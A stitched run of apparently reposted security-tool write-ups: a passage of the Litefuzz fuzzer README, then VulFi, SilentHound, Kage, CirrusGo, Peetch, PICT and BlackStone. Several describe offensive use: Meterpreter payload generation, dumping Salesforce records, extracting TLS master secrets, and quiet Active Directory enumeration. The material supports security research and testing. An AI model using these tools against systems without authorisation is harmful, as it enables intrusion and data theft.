sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -z

sudo litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

Yes, run these commands using (g)sudo on Windows to easily elevate to Admin from the console and make the registry changes needed for the features to be enabled. And this also illustrates another nuance for enabling malloc debuggers for targets: on Linux and Mac, we're using runtime environment flags which need to be passed every time to enable this feature. For Windows, we're modifying the registry so once it's passed the first time, one doesn't need to pass -z or --memdump in the fuzzing command line again (unless to disable or re-enable them).

fuzz PuTTY (puttygen) (Windows)

litefuzz -l -c "C:\Program Files (x86)\WinSCP\PuTTY\puttygen.exe FUZZ" -i input\ppk -x 0.5 -n 100000 -z

fuzz Adobe Reader like back in the day (Windows GUI)

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -i pdfs -x 3 -n 100000 -z

(WinAppDbg only supports python 2, so must use py2 on Windows)

note: reminder that you can enable PageHeap for the target app via -z in an elevanted prompt or using the installed sudo for gsudo win32 package that was installed during setup

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe FUZZ" -z

client

quick look

litefuzz -lk -c "ssh -T [email protected] -p 2222" -a tcp://localhost:2222 -i input/ssh-cli -o crashes/ssh -p -n 250000 -z glibc
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 9404
cmdline: ssh -T [email protected] -p 2222
address: tcp://localhost:2222
crash dir: crashes/ssh
input dir: input/ssh-cli
inputs: 4
iterations: 250000
mutator: random(mutators)

@ 73/250000 (0 crashes, 0 duplicates, ~1 day, 0:21:01 remaining)^C

resume? (y/n)> n
Terminated
...

cat /tmp/litefuzz/out
padding error: need 57895 block 8 mod 7
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

local client

fuzz SNMP client on the localhost (Linux)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

remote client

fuzz a remote FTP client (Linux)

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -n 100

note: depending on the target, client fuzzing may require listening on a privileged port (1-1024). In this case, on Linux you can either setcap cap_net_bind_service=+ep on the python interpreter or use sudo when running the fuzzer, on Mac just use sudo and on Windows you can run the fuzzer as Administrator to avoid any Permission Denied errors.

server

quick look

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 4001
cmdline: ./sc_serv shoutcast.conf
address: tcp://localhost:8000
crash dir: crashes/shoutcast
input dir: input/shoutcast
inputs: 3
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (1 crashes, 7 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (1) unique crashes and 7 dups
>> check crashes/shoutcast for more details

local server

fuzz a local Shoutcast server

litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -i input/shoutcast -o crashes/shoutcast -n 1000 -z

remote server

fuzz a remote SMTP server

litefuzz -s -a tcp://10.0.0.11:25 -i input/smtp-req -pp -n 10000

command line

usage: litefuzz.py [-h] [-l] [-k] [-s] [-c CMDLINE] [-i INPUTS] [-n ITERATIONS] [-x MAXTIME] [--mutator MUTATOR] [-a ADDRESS] [-o CRASHDIR] [-t TEMPDIR] [-f FUZZFILE]
[-m MINFILE] [-mm SUPERMIN] [-r REPROFILE] [-e] [-p] [-pp] [-u] [--nofuzz] [--key KEY] [--click] [--tls] [--golang] [--attach ATTACH] [--cmd CMD]
[--rmfile RMFILE] [--reportcrash REPORTCRASH] [--memdump] [--nomemdump] [-z [MALLOC]] [-zz] [-d]

optional arguments:
-h, --help show this help message and exit
-l, --local target will be executed locally
-k, --client target a network client
-s, --server target a network server
-c CMDLINE, --cmdline CMDLINE
target command line
-i INPUTS, --inputs INPUTS
input directory or file
-n ITERATIONS, --iterations ITERATIONS
number of fuzzing iterations (default: 1)
-x MAXTIME, --maxtime MAXTIME
timeout for the run (default: 1)
--mutator MUTATOR, --mutator MUTATOR
timeout for the run (default: 0=random)
-a ADDRESS, --address ADDRESS
server address in the ip:port format
-o CRASHDIR, --crashdir CRASHDIR
specify the directory to output crashes (default: crashes)
-t TEMPDIR, --tempdir TEMPDIR
specify the directory to output runtime fuzzing artifacts (default: OS tmp + run dir)
-f FUZZFILE, --fuzzfile FUZZFILE
specify the path and filename to place the fuzzed file (default: OS tmp + run dir + fuzz_random.ext)
-m MINFILE, --minfile MINFILE
specify a crashing file to generate a minimized version of it (bonus: may also find variant bugs)
-mm SUPERMIN, --supe rmin SUPERMIN
loops minimize to grind on until no more bytes can be removed
-r REPROFILE, --reprofile REPROFILE
specify a crashing file or directory to replay on the target
-e, --reuse enable second round fuzzing where any crashes found are reused as inputs
-p, --multibin use multiple requests or responses as inputs for fuzzing simple binary network sessions
-pp, --multistr use multiple requests or responses within input for fuzzing simple string-based network sessions
-u, --insulate only execute the target once and inside a debugger (eg. interactive clients)
--nofuzz, --nofuzz send input as-is without mutation (useful for debugging)
--key KEY, --key KEY send a particular key every iteration for interactive targets (eg. F5 for refresh)
--click, --click click the mouse (eg. position the cursor over target button to click beforehand)
--tl s, --tls enable TLS for network fuzzing
--golang, --golang enable fuzzing of Golang binaries
--attach ATTACH, --attach ATTACH
attach to a local server process name (mac only)
--cmd CMD, --cmd CMD execute this command after each fuzzing iteration (eg. umount /Volumes/test.dir)
--rmfile RMFILE, --rmfile RMFILE
remove this file after every fuzzing iteration (eg. target won't overwrite output file)
--reportcrash REPORTCRASH, --reportcrash REPORTCRASH
use ReportCrash to help catch crashes for a specified process name (mac only)
--memdump, --memdump enable memory dumps (win32)
--nomemdump, --nomemdump
disable memory dumps (win32)
-z [MALLOC], --malloc [MALLOC]
enable malloc debug helpers (free bugs, but perf cost)
-zz, --nomalloc disable malloc debug helpers (eg. pageheap)
-d, --debug Turn on debug statements

trophies

Litefuzz has fuzzed crashes out of various software packages such as...

  • antiword
  • AppleScript (OS X)
  • ArangoDB VelocyPack
  • Avast authenticode-parser
  • Avast RetDec
  • BBC Audio Waveform
  • ColorSync (OS X)
  • Dynamsoft BarcodeReader
  • eot2ttf
  • evernote2md
  • faad2
  • Facebook's Origami Studio
  • FontForge
  • ForestDB
  • Gifsicle
  • GPUJPEG
  • GPAC Multimedia Framework
  • Google Draco
  • GoPro GPR
  • GtkRadiant
  • IIPImage Server
  • John The Ripper
  • Kyoto Cabinet
  • latex2rtf
  • libMeshb
  • libembroidery
  • libsndfile
  • Lion Vector Graphics (lvg)
  • L-SMASH
  • MindNode
  • minimp4
  • MiniWeb Server
  • MLpack
  • Nvidia Data Center GPU Manager
  • Numbers (OS X)
  • OpenJPEG
  • OpenOrienteering Mapper
  • OSM Express
  • Pages (OS X)
  • PBRT-Parser
  • Pixar USD
  • Remote Apple Events (OS X)
  • Samsung rlottie
  • Samsung ThorVG
  • Shoutcast Server
  • Silo
  • syslog (OS X)
  • Tencent NCNN
  • TinyXML2
  • UEFITool
  • Ulfius Web Framework
  • zlib

FAQ

how did this project come about?

Fuzzing is fun! And it's nice to do projects which take a contrarian type of view that fuzzers don't always have to follow the modern or popular approaches to get to the end goal of finding bugs. Whether you're close to bare metal, getting code coverage across all paths or simply optimizing on the fast and flexible, the fundamental "invalidating assumptions" way of doing things, etc. However it manifests, enjoy it.

is this project actively maintained?

Please do not expect active support or maintenance on the project. Feel free to fork it to add new features or fix bugs, etc. Perhaps even do a PR for smaller things, although please do no have no expectations for responses or troubleshooting. It is not intended for development on this repo to be active.

how do you know the fuzzer is working well and did you measure it against others?

The purpose of Litefuzz is to find bugs across platforms. And it does. So, honestly the ability to measure it against fuzzerX or fuzzerY just didn't make the cut. Certain trade-offs were made and acknowledged at inception, see the #intro for more details.

what would you change if you were to re-write it today?

It works pretty well as it is and has been tested on a ton of different targets and scenarios. That being said, it could benefit standardizing on a more modular-based and plugin system where switching between targets and platforms didn't require as many additional checks in the operations side of the code, etc. Of course having more formal tests and a deployment system that would test it across supporting operating systems would create an environment that easier to work across when making changes to core functions. It grew from a small yet amibitious project into something a little bigger pretty quickly.

how stable is litefuzz?

The command line, GUI, network fuzzing (mostly on Linux and Mac), minimization, etc has been tested pretty thoroughly and should be pretty solid overall. Some of the more exotic features such as insulated network GUI fuzzing, ReportCrash support for Mac and some other niche features should be considered experimental.

are there unsupported scenarios for litefuzz?

A few of them, yes. But most are either uncommon scenarios that are buggy, required more time and research to "get right" or just don't quite work for platform related reasons. Many of them are explicitly exit with an "unsupported" message when you try to run it with such options and some caveats have been mentioned in the sections above when describing various features. Some of the more nuanced ones include repro mode on insulated apps isn't supported and also there's been limited testing on Mac apps using the insulate feature, Pyautogui seems to work fine on Linux and Windows but on Mac it didn't prove very reliable so consider it functionally unsupported and client fuzzing on Windows can be a little less reliable than other modes on other platforms.

There may be some edge cases here and there, but the most common local and network fuzzing scenarios have been tested and are working. Ah, these are joys of writing cross-platform tooling: rewarding, but it's hard to make everything work great all the time. Overall, fuzzing on Linux/Mac seems to be more stable and support more features overall, especially as it's had much more testing of network fuzzing than on the Windows platform, but an effort was made for at least the basics to be available on Win32 with a couple extras.

Feel free to fork this fuzzer and make such improvements, support the currently unsupported, etc or PRs for more minor but useful stuff.

what guarentees are given for this project or it's code?

Absolutely none. But it's pretty fun to fuzz and watch it hand you bugs.

author / references



VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries

By: Zion3R
26 April 2022 at 21:30


The VulFi (Vulnerability Finder) tool is a plugin to IDA Pro which can be used to assist during bug hunting in binaries. Its main objective is to provide a single view with all cross-references to the most interesting functions (such as strcpy, sprintf, system, etc.). For cases where a Hexrays decompiler can be used, it will attempt to rule out calls to these functions which are not interesting from a vulnerability research perspective (think something like strcpy(dst,"Hello World!")). Without the decompiler, the rules are much simpler (to not depend on architecture) and thus only rule out the most obvious cases.


Installation

Place the vulfi.py, vulfi_prototypes.json and vulfi_rules.json files in the IDA plugin folder (cp vulfi* <IDA_PLUGIN_FOLDER>).

Preparing the Database File

Before you run VulFi make sure that you have a good understanding of the binary that you work with. Try to identify all standard functions (strcpy, memcpy, etc.) and name them accordingly. The plugin is case insensitive and thus MEMCPY, Memcpy and memcpy are all valid names. However, note that the search for the function requires exact match. This means that memcpy? or std_memcpy (or any other variant) will not be detected as a standard function and therefore will not be considered when looking for potential vulnerabilities. If you are working with an unknown binary you need to set the compiler options first Options > Compiler. After that VulFi will do its best to filter all obvious false positives (such as call to printf with constant string as a first parameter). Please note that while the plugin is made without any ties to a specific ar chitecture some processors do not have full support for specifying types and in such case VulFi will simply mark all cross-references to potentially dangerous standard functions to allow you to proceed with manual analysis. In these cases, you can benefit from the tracking features of the plugin.

Usage

Scanning

To initiate the scan, select Search > VulFi option from the top bar menu. This will either initiate a new scan, or it will read previous results stored inside the idb/i64 file. The data are automatically saved whenever you save the database.

Once the scan is completed or once the previous results are loaded a table will be presented with a view containing following columns:

  • IssueName - Used as a title for the suspected issue.
  • FunctionName - Name of the function.
  • FoundIn - The function that contains the potentially interesting reference.
  • Address - The address of the detected call.
  • Status - The review status, initial Not Checked is assigned to every new item. The other statuses are False Positive, Suspicious and Vulnerable. Those can be set using a right-click menu on a given item and should reflect the results of the manual review of the given function call.
  • Priority - An attempt to prioritize more interesting calls over the less interesting ones. Possible values are High, Medium and Low. The priorities are defined along with other rules in vulfi_rules.json file.
  • Comment - A user defined comment for the given item.

In case that there are no data inside the idb/i64 file or user decides to perform a new scan. The plugin will ask whether it should run the scan using the default included rules or whether it should use a custom rules file. Please note that running a new scan with already existing data does not overwrite the previously found items identified by the rule with the same name as the one with previously stored results. Therefore, running the scan again does not delete existing comments and status updates.

In the right-click context menu within the VulFi view, you can also remove the item from the results or remove all items. Please note that any comments or status updates will be lost after performing this operation.

Investigation

Whenever you would like to inspect the detected instance of a possible vulnerable function, just double-click anywhere in the desired row and IDA will take you to the memory location which was identified as potentially interesting. Using a right-click and option Set Vulfi Comment allows you to enter comment for the given instance (to justify the status for example).

Adding More Functions

The plugin also allows for creating custom rules. These rules could be defined in the IDA interface (ideal for single functions) or supplied as a custom rule file (ideal for rules that aim to cover multiple functions).

Within the Interface

When you would like to trace a custom function, which was identified during the analysis, just switch the IDA View to that function, right-click anywhere within its body and select Add current function to VulFi.

Custom Set of Rules

It is also possible to load a custom file with set of multiple rules. To create a custom rule file with the below structure you can use the included template file here.

[   // An array of rules
{
"name": "RULE NAME", // The name of the rule
"alt_names":[
"function_name_to_look_for" // List of all function names that should be matched against the conditions defined in this rule
],
"wrappers":true, // Look for wrappers of the above functions as well (note that the wrapped function has to also match the rule)
"mark_if":{
"High":"True", // If evaluates to True, mark with priority High (see Rules below)
"Medium":"False", // If evaluates to True, mark with priority Medium (see Rules below)
"Low": "False" // If evaluates to True, mark with priority Low (see Rules below)
}
}
]

An example rule that looks for all cross-references to function malloc and checks whether its paramter is not constant and whether the return value of the function is checked is shown below:

{
"name": "Possible Null Pointer Dereference",
"alt_names":[
"malloc",
"_malloc",
".malloc"
],
"wrappers":false,
"mark_if":{
"High":"not param[0].is_constant() and not function_call.return_value_checked()",
"Medium":"False",
"Low": "False"
}
}

Rules

Available Variables

  • param[<index>]: Used to access the parameter to a function call (index starts at 0)
  • function_call: Used to access the function call event
  • param_count: Holds the count of parameters that were passed to a function

Available Functions

  • Is parameter a constant: param[<index>].is_constant()
  • Get numeric value of parameter: param[<index>].number_value()
  • Get string value of parameter: param[<index>].string_value()
  • Is parameter set to null after the call: param[<index>].set_to_null_after_call()
  • Is return value of a function checked: function_call.return_value_checked(<constant_to_check>)

Examples

  • Mark all calls to a function where third parameter is > 5: param[2].number_value() > 5
  • Mark all calls to a function where the second parameter contains "%s": "%s" in param[1].string_value()
  • Mark all calls to a function where the second parameter is not constant: not param[1].is_constant()
  • Mark all calls to a function where the return value is validated against the value that is equal to the number of parameters: function_call.return_value_checked(param_count)
  • Mark all calls to a function where the return value is validated against any value: function_call.return_value_checked()
  • Mark all calls to a function where none of the parameters starting from the third are constants: all(not p.is_constant() for p in param[2:])
  • Mark all calls to a function where any of the parameters are constant: any(p.is_constant() for p in param)
  • Mark all calls to a function: True

Issues and Warnings

  • When you request the parameter with index that is out of bounds any call to a function will be marked as Low priority. This is a way to avoid missing cross references where it was not possible to correctly get all parameters (this mainly applies to disassembly mode).
  • When you search within the VulFi view and change context out of the view and come back, the view will not load. You can solve this either by terminating the search operation before switching the context, moving the VulFi view to the side-view so that it is always visible or by closing and re-opening the view (no data will be lost).
  • Scans for more exotic architectures end with a lot of false positives.


SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.

By: Zion3R
1 August 2022 at 12:30


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler

By: Zion3R
3 August 2022 at 12:30

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.


Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing

You can install Kage binaries from here.

for developers

to run the app from source code:

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

For Generating APK Payload select Raw format in dropdown list.

Screenshots







Disclaimer

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Twitter: @iFalah

Email: [email protected]

Credits

Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc

electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue


This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.



Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go

By: Zion3R
4 August 2022 at 12:30


A fast tool to scan SAAS,PAAS App written in Go

SAAS App Support :

  • salesforce
  • contentful (next version)

Note flag -o output not working

install : golang 1.18Ver

go install -v github.com/Ph33rr/cirrusgo/cmd/[email protected]
or
go install -v github.com/Ph33rr/CirrusGo/cmd/[email protected]


Help:

cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,Cont
entDocument,ContentVersion,ContentBody,CaseComment,Not
e,Employee,Attachment,EmailMessage,CaseExternalDocumen
t,Attachment,Lead,Name,EmailTemplate,EmailMessageRelation
-gre --getrecord pull the Record id.
-re --recordid set the recode id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
--dump
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set recoder id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example :

cirrusgo salesforce -u https://loclhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirusgo salesforce -u https://localhost/ -cw



Peetch - An eBPF Playground

By: Zion3R
5 August 2022 at 12:30


peetch is a collection of tools aimed at experimenting with different aspects of eBPF to bypass TLS protocol protections.

Currently, peetch includes two subcommands. The first called dump aims to sniff network traffic by associating information about the source process with each packet. The second called tls allows to identify processes using OpenSSL to extract cryptographic keys.

Combined, these two commands make it possible to decrypt TLS exchanges recorded in the PCAPng format.


Installation

peetch relies on several dependencies including non-merged modifications of bcc and Scapy. A Docker image can be easily built in order to easily test peetch using the following command:

docker build -t quarkslab/peetch .

Commands Walk Through

The following examples assume that you used the following command to enter the Docker image and launch examples within it:

docker run --privileged --network host --mount type=bind,source=/sys,target=/sys --mount type=bind,source=/proc,target=/proc --rm -it quarkslab/peetch

dump

This sub-command gives you the ability to sniff packets using an eBPF TC classifier and to retrieve the corresponding PID and process names with:

peetch dump
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https S / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 SA / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https A / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https PA / Raw / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 A / Padding

Note that for demonstration purposes, dump will only capture IPv4 based TCP segments.

For convenience, the captured packets can be store to PCAPng along with process information using --write:

peetch dump --write peetch.pcapng
^C

This PCAPng can easily be manipulated with Wireshark or Scapy:

scapy
>>> l = rdpcap("peetch.pcapng")
>>> l[0]
<Ether dst=00:1c:42:00:00:18 src=00:1c:42:54:f3:34 type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=60 id=11088 flags=DF frag=0 ttl=64 proto=tcp chksum=0x4bb1 src=10.211.55.10 dst=208.97.177.124 |<TCP sport=53054 dport=https seq=631406526 ack=0 dataofs=10 reserved=0 flags=S window=64240 chksum=0xc3e9 urgptr=0 options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1272423534, 0)), ('NOP', None), ('WScale', 7)] |<Padding load='\x00\x00' |>>>>
>>> l[0].comment
b'curl/1289909'

tls

This sub-command aims at identifying process that uses OpenSSl and makes it is to dump several things like plaintext and secrets.

By default, peetch tls will only display one line per process, the --directions argument makes it possible to display the exchanges messages:

peetch tls --directions
<- curl (1291078) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256
> curl (1291078) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

Displaying OpenSSL buffer content is achieved with --content.

peetch tls --content
<- curl (1290608) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

0000 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
0010 48 6F 73 74 3A 20 77 77 77 2E 70 65 72 64 75 2E Host: www.perdu.
0020 63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A com..User-Agent:
0030 20 63 75 72 6C 2F 37 2E 36 38 2E 30 0D 0A 41 63 curl/7.68.0..Ac

-> curl (1290608) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

0000 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0010 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 39 20 4D .Date: Thu, 19 M
0020 61 79 20 32 30 32 32 20 31 38 3A 31 36 3A 30 31 ay 2022 18:16:01
0030 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap

The --secrets arguments will display TLS Master Secrets extracted from memory. The following example leverages --write to write master secrets to discuss to simplify decruypting TLS messages with Scapy:

$ (sleep 5; curl https://www.perdu.com/?name=highly%20secret%20information --tls-max 1.2 -http1.1) &

# peetch tls --write &
curl (1293232) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

# peetch dump --write traffic.pcapng
^C

# Add the master secret to a PCAPng file
$ editcap --inject-secrets tls,1293232-master_secret.log traffic.pcapng traffic-ms.pcapng

$ scapy
>>> load_layer("tls")
>>> conf.tls_session_enable = True
>>> l = rdpcap("traffic-ms.pcapng")
>>> l[13][TLS].msg
[<TLSApplicationData data='GET /?name=highly%20secret%20information HTTP/1.1\r\nHost: www.perdu.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n' |>]

Limitations

By design, peetch only supports OpenSSL and TLS 1.2.



Pict - Post-Infection Collection Toolkit

By: Zion3R
6 August 2022 at 12:30


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



BlackStone - Pentesting Reporting Tool

By: Zion3R
7 August 2022 at 12:30

Pentesting Reporting Tool (1)


BlackStone project or "BlackStone Project" is a tool created in order to automate the work of drafting and submitting a report on audits of ethical hacking or pentesting.

In this tool we can register in the database the vulnerabilities that we find in the audit, classifying them by internal, external audit or wifi, in addition, we can put your description and recommendation, as well as the level of severity and effort for its correction. This information will then help us generate in the report a criticality table as a global summary of the vulnerabilities found.

We can also register a company and, just by adding its web page, the tool will be able to find subdomains, telephone numbers, social networks, employee emails...


Pentesting Reporting Tool (2)

Docker Install

Install Docker

Install docker-compose
Install BlackStone
git clone https://github.com/micro-joan/BlackStone
cd BlackStone
